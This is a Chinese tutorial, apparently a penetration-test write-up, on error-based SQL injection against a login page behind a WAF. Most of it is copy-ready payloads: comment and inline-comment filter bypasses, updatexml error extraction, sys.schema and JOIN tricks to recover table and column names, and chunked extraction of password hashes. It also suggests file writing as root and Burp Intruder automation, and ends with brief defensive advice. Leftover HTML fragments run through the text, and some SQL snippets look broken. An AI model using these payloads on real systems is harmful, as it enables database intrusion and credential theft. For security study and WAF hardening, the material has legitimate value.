SQL注入实战：绕过WAF的多种技术详解<\/h1>

1. 漏洞发现与初步探测<\/h2>

1.1 漏洞特征<\/h3>
目标站点登录页面存在SQL注入漏洞<\/li>
插入单引号('<\/code>)会直接返回SQL报错语句，表明存在报错注入的可能性<\/li>
验证码存在"一码多用"问题，降低了自动化攻击的难度<\/li>
<\/ul>
1.2 WAF过滤规则<\/h3>
后台对以下内容进行了过滤：<\/p>

常用关键字：group_concat<\/code>、concat_ws<\/code>、information_schema<\/code><\/li>
空格字符<\/li>
其他SQL注入常用函数和语法<\/li>
<\/ul>
2. 绕过技术详解<\/h2>
2.1 注释替换空格<\/h3>
由于空格被过滤，可以使用注释符号\/**\/<\/code>替代空格：<\/p>
admin<\/span>'\/**\/and\/**\/updatexml(1,concat(0x7e,(database()),0x7e),1)--+
<\/span><\/span><\/span><\/code><\/pre>2.2 内联注释绕过关键字过滤<\/h3>
对于被过滤的关键字如select<\/code>，可使用内联注释：<\/p>
select<\/span> -><\/span> \/*!50000%50elect*\/<\/span>
<\/span><\/span><\/code><\/pre>注意：MySQL会忽略\/*!50000*\/<\/code>中的内容（如果版本号小于5.0.0），但现代版本会执行其中的语句。<\/p>
2.3 函数名与括号间的限制<\/h3>
当使用group_concat<\/code>等函数时，函数名与括号之间不能有任何字符（包括空格）：<\/p>
group_concat()  #<\/span> 正确<\/span>
<\/span><\/span>group_concat () #<\/span> 错误<\/span>
<\/span><\/span><\/code><\/pre>2.4 LIMIT替代GROUP_CONCAT<\/h3>
当group_concat<\/code>不可用时，可以使用limit<\/code>分页获取数据：<\/p>
\/*!50000%53elect*\/\/**\/<\/span>(table_schema)from<\/span>\/**\/<\/span>information_schema\/**\/<\/span>limit<\/span>\/**\/<\/span>0<\/span>,1<\/span>
<\/span><\/span><\/code><\/pre>2.5 绕过information_schema过滤<\/h3>
多种方法绕过information_schema<\/code>限制：<\/p>

使用反引号：<\/li>
<\/ol>
`<\/span>information_schema`<\/span>.`<\/span>schemata`<\/span>
<\/span><\/span><\/code><\/pre>
插入特殊注释：<\/li>
<\/ol>
information_schema\/*!*\/<\/span>.schemata
<\/span><\/span><\/code><\/pre>
使用换行符：<\/li>
<\/ol>
information_schema%<\/span>0<\/span>a.schemata
<\/span><\/span><\/code><\/pre>2.6 使用sys.schema替代information_schema<\/h3>
MySQL 5.7+提供了sys.schema<\/code>，可替代information_schema<\/code>获取元数据：<\/p>

sys.schema_auto_increment_columns<\/code>：自增ID监控表<\/li>
sys.schema_table_statistics_with_buffer<\/code>：I\/O延迟统计表<\/li>
mysql.innodb_table_stats<\/code>：InnoDB表统计信息<\/li>
<\/ul>
注意：访问sys<\/code>库通常需要超级管理员权限。<\/p>
2.7 JOIN无列名查询技术<\/h3>
当无法直接获取列名时，可以使用JOIN自连接产生错误暴露列名：<\/p>
select<\/span> *<\/span> from<\/span> (select<\/span> *<\/span> from<\/span> db.tables as<\/span> a join<\/span> db.tables as<\/span> b as<\/span> c<\/span>)
<\/span><\/span><\/code><\/pre>使用using<\/code>表达式避免错误：<\/p>
select<\/span> *<\/span> from<\/span> (select<\/span> *<\/span> from<\/span> xx as<\/span> a join<\/span> xx as<\/span> b using<\/span>(xx)) as<\/span> c<\/span>
<\/span><\/span><\/code><\/pre>3. 完整注入流程<\/h2>
3.1 获取基础信息<\/h3>
admin<\/span>'\/**\/and\/**\/updatexml(1,concat(0x7e,(database()),0x7e),1)--+
<\/span><\/span><\/span>admin'<\/span>\/**\/<\/span>and<\/span>\/**\/<\/span>updatexml(1<\/span>,concat(0<\/span>x7e,(version<\/span>()),0<\/span>x7e),1<\/span>)--+
<\/span><\/span><\/span><\/span>admin<\/span>'\/**\/and\/**\/updatexml(1,concat(0x7e,(user()),0x7e),1)--+
<\/span><\/span><\/span><\/code><\/pre>3.2 获取表名<\/h3>
使用sys.schema_auto_increment_columns<\/code>：<\/p>
admin<\/span>'\/**\/and\/**\/updatexml(1,concat(0x7e,(\/*!50000%53elect*\/\/**\/table_name\/**\/from\/**\/sys.schema_auto_increment_columns\/**\/where\/**\/table_schema\/database()\/**\/limit\/**\/0,1),0x7e),1)
<\/span><\/span><\/span><\/code><\/pre>计算表数量：<\/p>
admin<\/span>'\/**\/and\/**\/updatexml(1,concat(0x7e,(\/*!50000%53elect*\/\/**\/count(distinct(table_name))\/**\/from\/**\/sys.schema_auto_increment_columns\/**\/where\/**\/table_schema\/database()\/**\/limit\/**\/0,1),0x7e),1)
<\/span><\/span><\/span><\/code><\/pre>3.3 获取列名<\/h3>
使用JOIN技术：<\/p>
admin<\/span>'\/**\/and\/**\/updatexml(1,concat(0x7e,(\/*!50000%53elect*from\/**\/(\/*!50000%53elect*from\/**\/db.tables\/**\/as\/**\/a\/**\/join\/**\/db.tables\/**\/as\/**\/b\/as\/**\/c),0x7e),1)--+
<\/span><\/span><\/span><\/code><\/pre>3.4 获取数据<\/h3>
获取用户名：<\/p>
admin<\/span>'\/**\/and\/**\/updatexml(1,concat(0x7e,(\/*!50000%53elect*\/\/**\/name\/**\/from\/**\/xxx\/**\/where\/**\/id=xxx),0x7e),1)--+
<\/span><\/span><\/span><\/code><\/pre>分段获取长密码（32位）：<\/p>
admin<\/span>'\/**\/and\/**\/updatexml(1,concat(0x7e,(\/*!50000%53elect*\/\/**\/substr(password,1,31)\/**\/from\/**\/xxx\/**\/where\/**\/id=xxx),0x7e),1)--+
<\/span><\/span><\/span><\/code><\/pre>4. 高级技巧与注意事项<\/h2>

权限利用<\/strong>：确认当前用户为root后，可尝试文件写入（需知道绝对路径）<\/li>
数据完整性<\/strong>：从sys.schema<\/code>不同表中获取数据后需要去重<\/li>
分段获取<\/strong>：对于长数据（如密码hash），使用substr<\/code>分段获取<\/li>
自动化工具<\/strong>：可将请求发送至Burp Intruder模块进行自动化爆破<\/li>
<\/ol>
5. 防御建议<\/h2>

使用参数化查询或ORM框架<\/li>
最小权限原则，避免使用root账户连接数据库<\/li>
对用户输入进行严格过滤和转义<\/li>
禁用详细的错误信息返回<\/li>
定期更新WAF规则，防范新型绕过技术<\/li>
<\/ol>
6. 总结<\/h2>
本案例展示了在严格WAF环境下进行SQL注入的多种高级技术，关键在于：<\/p>

准确识别被过滤的关键字和字符<\/li>
灵活组合多种绕过技术<\/li>
利用数据库自身的特性和替代方案<\/li>
分步骤、耐心地获取所需信息<\/li>
<\/ol>
安全是一个持续的过程，攻防双方都在不断演进，理解攻击技术才能更好地进行防御。<\/p>